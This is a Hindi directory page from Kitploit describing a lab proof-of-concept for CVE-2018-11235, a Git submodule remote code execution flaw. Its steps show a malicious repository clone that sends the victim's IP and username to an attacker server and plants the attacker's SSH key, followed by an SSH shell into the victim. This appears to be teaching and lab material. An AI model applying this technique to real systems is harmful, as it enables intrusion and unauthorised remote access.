Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-11235 — प्रूफ ऑफ कॉन्सेप्ट - RCE शोषण : Git सबमॉड्यूल के नामों की कमजोरी - Ensimag नवंबर 2018 | Kitploit
उपकरण/GitHubGitHub/ygouzerh/cve-2018-11235
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूललैब और अभ्यास
GitHubygouzerh/cve-2018-11235

CVE-2018-11235

प्रूफ ऑफ कॉन्सेप्ट - RCE शोषण : Git सबमॉड्यूल के नामों की कमजोरी - Ensimag नवंबर 2018

रिपॉजिटरी देखें
117 साल पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-11235

आरंभ करना

डॉकर कंटेनर build करने के लिए, उपयोग करें :

root@kitploit:~
make docker

(निम्नलिखित make कमांड को आपकी मशीन के विभिन्न टर्मिनलों पर समानांतर में चलाया जाना चाहिए)

हमलावर सर्वर कंटेनर को शुरू करने के लिए, उपयोग करें :

root@kitploit:~
make run_server

पीड़ित का प्रतिनिधित्व करने वाले कंटेनर को शुरू करने के लिए, उपयोग करें :

root@kitploit:~
make run_client

कंटेनर client.py स्क्रिप्ट चलाएगा। स्क्रिप्ट हैकर को अपना IP पता और उपयोगकर्ता नाम भेजेगा।

दुर्भावनापूर्ण git रिपॉजिटरी को क्लोन करने के लिए क्लाइंट कंसोल के निर्देशों का पालन करें।

root@kitploit:~
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned

आप देखेंगे कि पीड़ित का IP पता और उपयोगकर्ता नाम सर्वर को भेज दिया गया है।

क्लोन के बाद, जाँचें कि हमलावरों की सार्वजनिक कुंजी क्लाइंट की authorized_keys में सही ढंग से जोड़ी गई है।

इसके बाद, आप निम्नलिखित कमांड का उपयोग करके सर्वर से क्लाइंट पर एक शेल खोल सकते हैं (अपनी मशीन पर निष्पादित करें):

root@kitploit:~
make server_bash

ssh <transmitted_username>@<transmitted_host>

प्रश्न

यदि आपको इस Proof of Concept को निष्पादित करने में कोई समस्या होती है, तो कृपया इस रिपॉजिटरी पर एक issue बनाएँ: https://github.com/ygouzerh/CVE-2018-11235/issues , हम आपको यथाशीघ्र उत्तर देंगे।

टूल डाउनलोड करें